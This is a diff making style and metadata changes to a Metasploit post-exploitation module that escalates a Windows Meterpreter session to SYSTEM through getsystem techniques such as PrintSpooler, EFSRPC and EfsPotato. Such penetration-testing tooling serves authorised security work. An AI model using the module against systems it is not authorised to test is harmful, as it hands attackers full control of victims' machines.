@@ -36,18 +36,21 @@ class MetasploitModule < Msf::Post
             'PrintSpooler',
             'EFSRPC',
             'EfsPotato'
-          ]
+          ],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
         }
       )
     )
 
     register_options([
-      OptInt.new('TECHNIQUE', [false, "Specify a particular technique to use (1-6), otherwise try them all", 0])
+      OptInt.new('TECHNIQUE', [false, 'Specify a particular technique to use (1-6), otherwise try them all', 0])
     ])
   end
 
   def unsupported
-    print_error("This platform is not supported with this script!")
+    print_error('This platform is not supported with this script!')
     raise Rex::Script::Completed
   end
 
@@ -57,15 +60,15 @@ class MetasploitModule < Msf::Post
     unsupported if client.platform != 'windows' || (client.arch != ARCH_X64 && client.arch != ARCH_X86)
 
     if is_system?
-      print_good("This session already has SYSTEM privileges")
+      print_good('This session already has SYSTEM privileges')
       return
     end
 
     begin
       result = client.priv.getsystem(technique)
       print_good("Obtained SYSTEM via technique #{result[1]}")
-    rescue Rex::Post::Meterpreter::RequestError => e
-      print_error("Failed to obtain SYSTEM access")
+    rescue Rex::Post::Meterpreter::RequestError
+      print_error('Failed to obtain SYSTEM access')
     end
   end
 end
